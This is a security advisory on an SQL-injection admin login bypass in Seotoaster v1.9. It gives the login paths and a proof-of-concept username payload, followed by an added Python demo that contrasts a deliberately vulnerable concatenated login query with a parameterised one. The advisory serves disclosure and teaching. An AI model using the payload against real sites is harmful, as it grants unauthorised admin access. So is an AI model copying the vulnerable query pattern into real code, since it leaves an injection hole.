#################################################################################
# Advisory: Seotoaster SQL-Injection Admin Login Bypass
# Author: Stefan Schurtz
# Contact: sschurtz@t-online.de
# Affected Software: Successfully tested on Seotoaster v.1.9
# Vendor URL: http://www.seotoaster.com/
# Vendor Status: fixed
#################################################################################

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypasses the admin login.

==================
PoC-Exploit
==================

http://<target>/seotoaster/go or http://<target>/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version.

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz

===========
References
===========

http://secunia.com/advisories/46881/
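The root cause behind the PoC input, as an added illustration that is not taken from the Seotoaster code base: a login query assembled by string concatenation, beside the parameterised query that neutralises the same input. The table and column names, the password hashing and the in-memory SQLite database are assumptions; SQLite has no MySQL-style "#" line comment, so the vulnerable path emulates it for the demo only.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed stand-in for an application's admin table (assumed schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, "
                 "password TEXT, role_id TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'admin@example.com', ?, 'admin')",
                 (hashlib.sha256(b"correct horse").hexdigest(),))
    conn.commit()
    return conn


def vulnerable_login(conn, user, pw):
    """Login check built by string concatenation (the defect class the advisory reports)."""
    pw_hash = hashlib.sha256(pw.encode()).hexdigest()
    # With user = "' or 1=1)#" the quote closes the literal, ")" closes the
    # grouping parenthesis and "#" comments out the password comparison, so the
    # WHERE clause collapses to (email = '' or 1=1) and returns the first row.
    sql = ("SELECT id, role_id FROM user WHERE (email = '" + user +
           "' AND password = '" + pw_hash + "')")
    # Emulate MySQL's "#" line comment on SQLite for this demonstration only
    # (assumption: the real backend is MySQL, where no emulation is needed).
    sql = sql.split("#", 1)[0]
    return conn.execute(sql).fetchone()


def safe_login(conn, user, pw):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    pw_hash = hashlib.sha256(pw.encode()).hexdigest()
    return conn.execute(
        "SELECT id, role_id FROM user WHERE (email = ? AND password = ?)",
        (user, pw_hash),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1)#"            # the advisory's User value, PW arbitrary
    print("vulnerable:", vulnerable_login(db, payload, "notimportant"))  # (1, 'admin')
    print("parameterised:", safe_login(db, payload, "notimportant"))     # None
```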